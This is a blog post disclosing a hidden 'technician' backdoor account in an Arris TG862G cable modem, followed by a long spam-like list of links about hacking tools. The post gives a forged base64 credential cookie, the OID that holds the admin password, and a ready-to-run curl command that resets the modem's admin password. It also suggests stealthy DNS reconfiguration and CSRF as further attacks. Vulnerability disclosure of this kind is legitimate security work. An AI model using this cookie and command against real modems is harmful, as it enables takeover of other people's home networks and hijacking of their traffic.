Friday, August 21, 2020

Arris Cable Modem Backdoor - I'm A Technician, Trust Me.

Vendor backdoors are the worst. Sloppy coding leading to unintentional "bugdoors" is somewhat defendable, but flat out backdoors are always unacceptable. Todays example is brought to you by Arris. A great quote from their site -
Subscribers want their internet to be two things, fast and worry free. Cable operators deploy services to meet the speed expectations, and trust ARRIS to provide the cable modems that deliver the reliability.
Nothing spells "trust" and "worry free" like a backdoor account, right?! Anyways, the following was observed on an Arris TG862G cable modem running the following firmware version -TS070563_092012_MODEL_862_GW

After successfully providing the correct login and password to the modems administration page, the following cookie is set (client side):
Cookie: credential=eyJ2YWxpZCI6dHJ1ZSwidGVjaG5pY2lhbiI6ZmFsc2UsImNyZWRlbnRpYWwiOiJZV1J0YVc0NmNHRnpjM2R2Y21RPSIsInByaW1hcnlPbmx5IjpmYWxzZSwiYWNjZXNzIjp7IkFMTCI6dHJ1ZX0sIm5hbWUiOiJhZG1pbiJ9
 All requests must have a valid "credential" cookie set (this was not the case in a previous FW release - whoops) if the cookie is not present the modem will reply with "PLEASE LOGIN". The cookie value is just a base64 encoded json object:
{"valid":true,"technician":false,"credential":"YWRtaW46cGFzc3dvcmQ=","primaryOnly":false,"access":{"ALL":true},"name":"admin"}
And after base64 decoding the "credential" value we get:
{"valid":true,"technician":false,"credential":"admin:password","primaryOnly":false,"access":{"ALL":true},"name":"admin"}
Sweet, the device is sending your credentials on every authenticated request (without HTTPS), essentially they have created basic-auth 2.0 - As the kids say "YOLO". The part that stuck out to me is the "technician" value that is set to "false" - swapping it to "true" didn't do anything exciting, but after messing around a bit I found that the following worked wonderfully:
Cookie: credential=eyJjcmVkZW50aWFsIjoiZEdWamFHNXBZMmxoYmpvPSJ9
Which decodes to the following:
{"credential":"dGVjaG5pY2lhbjo="}
And finally:
{"credential":"technician:"} 
Awesome, the username is "technician" and the password is empty. Trying to log into the interface using these credentials does not work :(




That is fairly odd. I can't think of a reasonable reason for a hidden account that is unable to log into the UI. So what exactly can you do with this account? Well, the web application is basically a html/js wrapper to some CGI that gets/sets SNMP values on the modem. It is worth noting that on previous FW revisions the CGI calls did NOT require any authentication and could be called without providing a valid "credential" cookie. That bug was killed a few years ago at HOPE 9.

Now we can resurrect the ability to set/get SNMP values by setting our "technician" account:


That's neat, but we would much rather be using the a fancy "web 2.0" UI that a normal user is accustomed to, instead of manually setting SNMP values like some sort of neckbearded unix admin. Taking a look at the password change functionality appeared to be a dead end as it requires the previous password to set a new one:


Surprisingly the application does check the value of the old password too! Back to digging around the following was observed in the "mib.js" file:
SysCfg.AdminPassword= new Scalar("AdminPassword","1.3.6.1.4.1.4115.1.20.1.1.5.1",4);
Appears that the OID "1.3.6.1.4.1.4115.1.20.1.1.5.1" holds the value of the "Admin" password! Using the "technician" account to get/walk this OID comes up with nothing:
HTTP/1.1 200 OK
Date: Tue, 23 Sep 2014 19:58:40 GMT
Server: lighttpd/1.4.26-devel-5842M
Content-Length: 55
{
"1.3.6.1.4.1.4115.1.20.1.1.5.1.0":"",
"1":"Finish"
}
What about setting a new value? Surely that will not work....



That response looks hopeful. We can now log in with the password "krad_password" for the "admin" user:


This functionality can be wrapped up in the following curl command:
curl -isk -X 'GET' -b 'credential=eyJjcmVkZW50aWFsIjoiZEdWamFHNXBZMmxoYmpvPSJ9' 'http://192.168.100.1:8080/snmpSet?oid=1.3.6.1.4.1.4115.1.20.1.1.5.1.0=krad_password;4;'
Of course if you change the password you wouldn't be very sneaky, a better approach would be re-configuring the modems DNS settings perhaps? It's also worth noting that the SNMP set/get is CSRF'able if you were to catch a user who had recently logged into their modem.

The real pain here is that Arris keeps their FW locked up tightly and only allows Cable operators to download revisions/fixes/updates, so you are at the mercy of your Cable operator, even if Arris decides that its worth the time and effort to patch this bug backdoor - you as the end user CANNOT update your device because the interface doesn't provide that functionality to you! Next level engineering.


Related articles


  1. Hacker Tools Apk Download
  2. Github Hacking Tools
  3. Hacking Apps
  4. Game Hacking
  5. Pentest Tools Find Subdomains
  6. World No 1 Hacker Software
  7. Hacker Tools List
  8. Pentest Reporting Tools
  9. Hacker Security Tools
  10. Black Hat Hacker Tools
  11. Best Hacking Tools 2019
  12. Hacker Tools Free
  13. Hacks And Tools
  14. Game Hacking
  15. Computer Hacker
  16. Hak5 Tools
  17. Pentest Tools Website
  18. Pentest Tools Linux
  19. Hacker Tool Kit
  20. Hacker Security Tools
  21. Bluetooth Hacking Tools Kali
  22. Hacker Tools 2019
  23. Top Pentest Tools
  24. Hacker
  25. Hacker Techniques Tools And Incident Handling
  26. Hacking Tools Free Download
  27. Pentest Tools Bluekeep
  28. Black Hat Hacker Tools
  29. Pentest Reporting Tools
  30. Hacker
  31. Nsa Hack Tools Download
  32. Pentest Tools Free
  33. Hacking Tools Online
  34. Hacker Tools Apk Download
  35. How To Install Pentest Tools In Ubuntu
  36. Wifi Hacker Tools For Windows
  37. World No 1 Hacker Software
  38. Pentest Tools Nmap
  39. Tools 4 Hack
  40. Hacker Tools Apk
  41. Growth Hacker Tools
  42. Hacking Tools Windows
  43. Physical Pentest Tools
  44. Computer Hacker
  45. Hacker Tools For Ios
  46. Black Hat Hacker Tools
  47. Hacking Tools Windows 10
  48. Hack Rom Tools
  49. Hacker
  50. Hacker Tools For Mac
  51. What Are Hacking Tools
  52. Pentest Reporting Tools
  53. Hacking Tools 2020
  54. Hacker Tools Hardware
  55. Pentest Tools Alternative
  56. Pentest Tools Find Subdomains
  57. Pentest Tools For Mac
  58. Pentest Automation Tools
  59. Install Pentest Tools Ubuntu
  60. Hacker Search Tools
  61. Pentest Tools Url Fuzzer
  62. Hacking Tools Kit
  63. Pentest Tools Alternative
  64. Hacking Tools For Mac
  65. How To Install Pentest Tools In Ubuntu
  66. Hack Rom Tools
  67. Termux Hacking Tools 2019
  68. Pentest Tools Find Subdomains
  69. Hacker Tools Mac
  70. Hack Tools For Pc
  71. Hack Tools 2019
  72. Best Pentesting Tools 2018
  73. Hacking Tools Name
  74. Hacker Tools For Windows
  75. Hacking Tools For Mac
  76. Free Pentest Tools For Windows
  77. Usb Pentest Tools
  78. Pentest Tools Github
  79. Hacking Tools Mac
  80. Beginner Hacker Tools
  81. Hacker Tools
  82. Hackrf Tools
  83. Hacking Tools For Kali Linux
  84. Pentest Tools Tcp Port Scanner
  85. Best Pentesting Tools 2018
  86. Top Pentest Tools
  87. Hacker Tools Free
  88. Pentest Tools Windows
  89. Hacker Hardware Tools
  90. Hacking Tools For Mac
  91. Pentest Tools For Android
  92. Pentest Tools Find Subdomains
  93. Pentest Tools For Ubuntu
  94. Bluetooth Hacking Tools Kali
  95. Pentest Tools Open Source
  96. Pentest Tools Review
  97. Hack Tools Online
  98. Pentest Tools Find Subdomains
  99. Pentest Tools Online
  100. Beginner Hacker Tools
  101. Growth Hacker Tools
  102. Hack Tool Apk
  103. Hack Tools Pc
  104. Hacking Tools Usb
  105. Hacker Tools Apk Download
  106. Github Hacking Tools
  107. Ethical Hacker Tools
  108. Beginner Hacker Tools
  109. Pentest Tools For Mac
  110. Pentest Tools Github
  111. Nsa Hacker Tools
  112. Hack And Tools
  113. Pentest Tools Kali Linux
  114. Hacker Tools Apk Download
  115. Hacker Tools Github
  116. Tools For Hacker
  117. Pentest Tools Apk
  118. What Are Hacking Tools
  119. Hacking Tools Software
  120. Pentest Tools Find Subdomains
  121. Hack Tools Pc
  122. Hacking App
  123. Hack Tool Apk
  124. Hacking Tools For Windows 7
  125. Hacking Tools 2019
  126. Best Hacking Tools 2020
  127. Tools For Hacker
  128. Hacking Apps
  129. Hacking Tools Windows 10
  130. Pentest Tools Find Subdomains
  131. Pentest Reporting Tools
  132. Hacker Tools Apk
  133. Black Hat Hacker Tools
  134. New Hack Tools
  135. Hacking Apps
  136. Hack Tools Pc
  137. How To Hack
  138. Hacking Tools For Kali Linux
  139. Hacker Hardware Tools
  140. Hacker Techniques Tools And Incident Handling
  141. Hacker Tools Hardware
  142. Hacker Tools Free
  143. Hacker Techniques Tools And Incident Handling
  144. Hacking Tools Usb
  145. Hack Tools Pc
  146. Hack Website Online Tool
  147. Hack Tools Github
  148. Hacking Tools
  149. Hackers Toolbox
  150. Free Pentest Tools For Windows
  151. Hacking Tools Windows 10
Posted by at

No comments:

Post a Comment

Subscribe to: Post Comments (Atom)